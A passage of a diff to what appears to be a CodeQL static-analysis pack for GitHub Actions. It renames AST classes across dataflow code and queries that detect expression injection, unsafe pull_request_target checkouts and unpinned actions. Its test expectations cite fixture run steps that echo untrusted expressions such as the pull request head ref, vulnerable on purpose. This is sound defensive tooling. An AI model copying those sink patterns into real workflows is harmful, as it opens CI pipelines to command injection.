rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAStepStmt() or - child = super.getOutputsStmt() or - child = super.getStrategyStmt() or - child = super.getUsesExpr() + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() or + child = super.getUses() ) and l = child.getLocation() | @@ -263,12 +257,10 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class UsesExprTree extends LeafTree instanceof UsesExpr { } - -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and l = child.getLocation() | @@ -279,11 +271,10 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } } -private class RunTree extends StandardPreOrderTree instanceof RunExpr { - //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and l = child.getLocation() | @@ -294,4 +285,16 @@ private class RunTree extends StandardPreOrderTree instanceof RunExpr { } } -private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + +private class EnvExprTree extends LeafTree instanceof EnvExpr { } + +private class ExprAccessTree extends LeafTree instanceof ContextExpression { } + +private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 594b6017729e..479078fe18b2 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -42,7 +42,7 @@ predicate sinkModel(string action, string version, string input, string kind) { predicate externallyDefinedSource( DataFlow::Node source, string sourceType, string fieldName, string trigger ) { - exists(UsesExpr uses, string action, string version, string kind | + exists(Uses uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( @@ -65,7 +65,7 @@ predicate externallyDefinedSource( predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { - exists(UsesExpr uses, string action, string version, string input, string output | + exists(Uses uses, string action, string version, string input, string output | summaryModel(action, version, input, output, "taint") and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and @@ -87,7 +87,7 @@ predicate externallyDefinedStoreStep( } predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { - exists(UsesExpr uses, string action, string version, string input | + exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0e82498bfc15..c30c963afdb0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -114,7 +114,7 @@ private class EventSource extends RemoteFlowSource { string trigger; EventSource() { - exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) or trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and @@ -158,9 +158,9 @@ private class ExternallyDefinedSource extends RemoteFlowSource { * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { - CompositeActionStmt c; + CompositeAction c; - CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bc0c782e9ff0..64df342ae9b7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -34,7 +34,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(RunExpr r, string varName, string output | + exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b9aafb8ec948..62975959b399 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,21 +54,22 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { any() } + //DataFlowExpr() { this.getAstNode() instanceof Expression } } /** * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { - DataFlowCall() { super.getAstNode() instanceof UsesExpr } + DataFlowCall() { super.getAstNode() instanceof Uses } /** Gets a textual representation of this element. */ string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getCallee() } + string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } @@ -82,11 +83,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { Location getLocation() { result = super.getLocation() } string getName() { - if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() + if this instanceof ReusableWorkflow + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else - if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() + if this instanceof CompositeAction + then result = this.(CompositeAction).getLocation().getFile().getRelativePath() else none() } } @@ -134,9 +135,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs - name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() } predicate forceHighPrecision(Content c) { c instanceof FieldContent } @@ -149,14 +150,14 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -172,11 +173,11 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | + exists(Uses astFrom, StepsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -189,11 +190,11 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { * field name. */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + exists(Uses astFrom, NeedsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -202,10 +203,10 @@ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputsCtxAccessExpr astTo | + exists(AstNode astFrom, InputsExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -214,10 +215,10 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ matrix.foo }} */ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, MatrixCtxAccessExpr astTo | + exists(AstNode astFrom, MatrixExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -226,12 +227,12 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvCtxAccessExpr astTo | + exists(Expression astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) ) } @@ -266,17 +267,17 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** - * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(CtxAccessExpr access | + exists(ContextExpression access | ( - access instanceof NeedsCtxAccessExpr or - access instanceof StepsCtxAccessExpr or - access instanceof JobsCtxAccessExpr + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and + node1.asExpr() = access.getTarget() and node2.asExpr() = access ) } @@ -294,7 +295,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { - exists(OutputsStmt out, string fieldName | + exists(Outputs out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 5fe3c7417351..a8434cdb6033 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -52,11 +52,11 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input and - input = any(InputsStmt s).getInputExpr(_) + input = any(Inputs s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) } override string toString() { result = "input " + input.toString() } @@ -81,12 +81,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -94,11 +94,11 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputsStmt outputs; + private Outputs outputs; ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflowStmt s).getOutputsStmt() + outputs = any(ReusableWorkflow s).getOutputs() } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c0a694455dc9..fbdf9ca7daa4 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "matrix.yml" + source.getLocation().getFile().getBaseName() = "argus_case_study.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 525307bcc28b..5bff6abc7bb9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index b3eb6d348a85..12703a6cff2d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index b451d9d1bda2..e5933a73b36c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 9317b9001581..1e1f942b200d 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index eeea688b273f..7bcea3d45b02 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 3949488e1298..5ac0c2999295 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index a6baf060c9d8..63f1a7a9d3a3 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -40,8 +40,7 @@ where source .getNode() .asExpr() - .(Statement) - .getEnclosingWorkflowStmt() + .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index c34fcb74bbc0..b13bf88abe64 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index a4cecf18b789..9373bf808e34 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,11 @@ import actions -from WorkflowStmt workflow, JobStmt job +from Workflow workflow, Job job where - job = workflow.getAJobStmt() and + job = workflow.getAJob() and ( - not exists(workflow.getPermissionsStmt()) and - not exists(job.getPermissionsStmt()) + not exists(workflow.getPermissions()) and + not exists(job.getPermissions()) ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 3c951a4e0b0c..34bcbd7b0605 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,10 +21,10 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +from StepUses uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and - uses.getEnclosingWorkflowStmt() = workflow and + uses.getEnclosingWorkflow() = workflow and ( workflow.getName() = name or diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 3c745b5d84aa..ed96d5f07c1b 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,34 +18,34 @@ import actions /** * An If node that contains an `actor` check */ -class ActorCheckStmt extends IfStmt { - ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +class ActorCheck extends If { + ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } } /** * An If node that contains a `label` check */ -class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { +class LabelCheck extends If { + LabelCheck() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +from Workflow w, Job job, StepUses checkoutStep where w.hasTriggerEvent("pull_request_target") and - w.getAJobStmt() = job and - job.getAStepStmt() = checkoutStep and + w.getAJob() = job and + job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep .getArgumentExpr("ref") - .(ExprAccessExpr) + .(Expression) .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" ]) and - not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and - not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) + not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and + not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4007e6454ea4..ffbbed2bac18 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -90,18 +90,11 @@ stepUsesNodes | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | jobUsesNodes usesSteps -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -runSteps1 +runSteps | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | -runSteps2 -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | runStepChildren | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | @@ -115,21 +108,6 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -varAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | -orphanVarAccesses -nonOrphanVarAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -200,6 +178,8 @@ parentNodes | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | cfgNodes +dfNodes +exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -218,44 +198,15 @@ cfgNodes | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -dfNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -exprNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| 